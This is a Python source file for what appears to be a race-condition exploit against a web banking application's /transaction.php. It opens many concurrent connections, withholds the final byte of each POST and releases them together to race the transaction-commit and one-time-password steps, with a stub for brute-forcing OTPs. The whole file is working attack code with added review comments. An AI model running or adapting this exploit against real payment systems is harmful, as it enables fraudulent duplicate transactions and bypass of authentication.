import asynchat
import asyncore
import socket
from config import TARGET_HOST, CONCURRENT_RACE, RE_TICKET
from misc import BaseForAll
import threading
__author__ = 'Gifts'
# Neither name below is referenced anywhere in this file; presumably they are
# shared with other modules that import them -- confirm before removing.
RaceCounterLock = threading.Condition()
RaceCounter = CONCURRENT_RACE
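class HTTPRace(asynchat.async_chat):
    """One racing HTTP connection using the "last-byte sync" technique.

    On construction everything except the final byte of *data* is queued for
    sending, so the server holds an almost complete request. Calling
    ``send_end()`` on every racer back-to-back then releases the withheld
    byte of each, the idea being that the server starts processing all the
    requests at nearly the same instant.

    Args:
        data: the complete raw request as a byte string (a ``str`` on the
            Python 2 this file targets, ``bytes`` on Python 3). Must be
            non-empty.
        sock: an already-connected socket. When given it is registered with
            asyncore (in *map*, defaulting to the global socket map) so that
            ``asyncore.loop()`` drives it; ``None`` leaves the racer unbound
            and the queued data simply waits in ``producer_fifo``.
        map: passed through to ``asynchat.async_chat``; the name shadows the
            builtin only to mirror the stdlib signature.

    Raises:
        ValueError: if *data* is empty -- there would be no final byte to
            hold back, and the original code would have failed later with an
            IndexError in ``send_end()``.

    NOTE(review): ``asynchat``/``asyncore`` were removed from the standard
    library in Python 3.12; this class needs Python 2.7 or 3.x < 3.12.
    """

    def __init__(self, data, sock=None, map=None):
        if not data:
            raise ValueError('data must be a non-empty request')
        asynchat.async_chat.__init__(self, sock, map)
        # After 100 response bytes we have seen enough: see found_terminator.
        self.set_terminator(100)
        self.ibuffer = []
        # Queue all but the last byte now; send_end() releases the last one.
        self.push(data[:-1])
        self.to_send = data

    def collect_incoming_data(self, data):
        """Accumulate response bytes until the 100-byte terminator fires.

        Nothing in this file ever reads ``ibuffer``; only timing matters.
        """
        self.ibuffer.append(data)

    def found_terminator(self):
        """Discard the input/output buffers and close once the queue drains."""
        self.discard_buffers()
        self.close_when_done()

    def send_end(self):
        """Release the withheld final byte of the request.

        ``[-1:]`` rather than ``[-1]``: indexing a ``bytes`` object yields an
        ``int`` on Python 3, which ``push()`` rejects, whereas the one-byte
        slice is a valid length-1 sequence for both ``str`` and ``bytes``.
        """
        self.push(self.to_send[-1:])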
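class RaceExploit(BaseForAll):
    """Worker that fires a burst of near-simultaneous POSTs at /transaction.php.

    Another thread notifies ``RaceLock``; this worker then runs one race round
    for whatever stage ``self._pre_otp(self.obj)`` reports and notifies
    ``RaceLock`` back. ``BaseForAll`` (project class, not shown) presumably
    supplies ``start()`` / the thread machinery and ``_pre_otp`` -- confirm.

    All traffic is plain HTTP to port 80 of ``TARGET_HOST`` (no TLS).
    """

    # Class attribute: one Condition shared by every RaceExploit instance.
    RaceLock = threading.Condition()

    def __init__(self):
        super(RaceExploit, self).__init__()

    def set_obj(self, obj):
        """Attach the session object whose ``gen_auth_cookie()`` signs requests.

        Must be called before the worker is first woken up; ``run()`` reads
        ``self.obj`` unconditionally.
        """
        self.obj = obj

    def create_connection(self):
        # Deliberately a no-op; presumably disables connection setup that
        # BaseForAll would otherwise perform -- confirm against BaseForAll.
        pass

    def _build_request(self, step, pad_len):
        """Return the raw HTTP/1.1 POST for transaction.php stage *step*.

        The body is ``step=<step>&`` followed by *pad_len* bytes of ``'a'``
        (presumably so the request spans several TCP segments before the
        final byte is released -- confirm). ``Content-Length`` is derived
        from the body, so the two never disagree.
        """
        post_data = 'step={0}&'.format(step) + ('a' * pad_len)
        return "\r\n".join((
            'POST /transaction.php HTTP/1.1',
            'Host: {0}'.format(TARGET_HOST),
            'Cookie: {0}'.format(self.obj.gen_auth_cookie()),
            'User-Agent: Python-urllib/2.7',
            'Content-Type: application/x-www-form-urlencoded',
            'Content-Length: {0}'.format(len(post_data)),
            'Connection: Close',
            '',
            post_data,
        ))

    def _fire_race(self, request):
        """Run one race round with *request* over CONCURRENT_RACE connections.

        Each racer queues all but the last byte immediately; after a short
        asyncore drain the final bytes are released back-to-back, then a
        second drain lets the responses / closes complete. ``loop(0.15,
        count=N)`` bounds each drain at roughly N * 0.15 s.

        If opening a connection fails part-way, the racers already opened are
        closed before the error propagates so they do not linger in asyncore's
        global socket map and get serviced by a later round.
        """
        racers = []
        try:
            for _ in range(CONCURRENT_RACE):
                sock = socket.create_connection((TARGET_HOST, 80))
                racers.append(HTTPRace(request, sock))
        except Exception:
            for racer in racers:
                racer.close()
            raise
        asyncore.loop(0.15, count=20)
        # A plain loop, not map(): map() is lazy on Python 3 and would never
        # call send_end().
        for racer in racers:
            racer.send_end()
        asyncore.loop(0.15, count=30)

    def run(self):
        """Thread body: block on RaceLock, run one round, notify, repeat.

        The ``finally`` notifies ``RaceLock`` even when the round raised or
        returned, so the driver that woke us is never left waiting. A regex
        miss in the brute-OTP branch ends the thread (``return False``).

        NOTE(review): ``Condition.wait()`` is used without a predicate, so a
        ``notify()`` issued before this thread has reached ``wait()`` is lost
        and the thread blocks until the next one; the threading docs
        recommend a predicate loop / ``wait_for``. ``self.obj`` must have
        been set via ``set_obj`` (unless BaseForAll sets it) or ``_pre_otp``
        raises AttributeError on the first wake-up.
        """
        while 1:
            with self.RaceLock:
                self.RaceLock.wait()
            try:
                data = self._pre_otp(self.obj)
                # 1) Commit step
                if 'Commit transaction.' in data:
                    self._fire_race(self._build_request('step3', 1896))
                # 2) SmartCard otp
                elif 'One-time password:' in data:
                    self._fire_race(self._build_request('step4', 4096 * 2))
                # 3) Brute otp -- only the ticket is extracted so far
                elif 'One-time password (#' in data:
                    tmp_ticket = RE_TICKET.search(data)
                    if not tmp_ticket:
                        return False
                    tmp_ticket = tmp_ticket.group(1)
                    # TODO: implement dupe for OTP list (left unfinished in
                    # the original; tmp_ticket is currently unused)
            finally:
                with self.RaceLock:
                    self.RaceLock.notify()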
# Import-time side effect: the worker thread is created and started as soon as
# this module is imported (start() is inherited from BaseForAll, not defined
# here). It immediately blocks in RaceLock.wait(); the importer must call
# RaceObject.set_obj(...) and then notify RaceExploit.RaceLock to run a round.
RaceObject = RaceExploit()
RaceObject.start()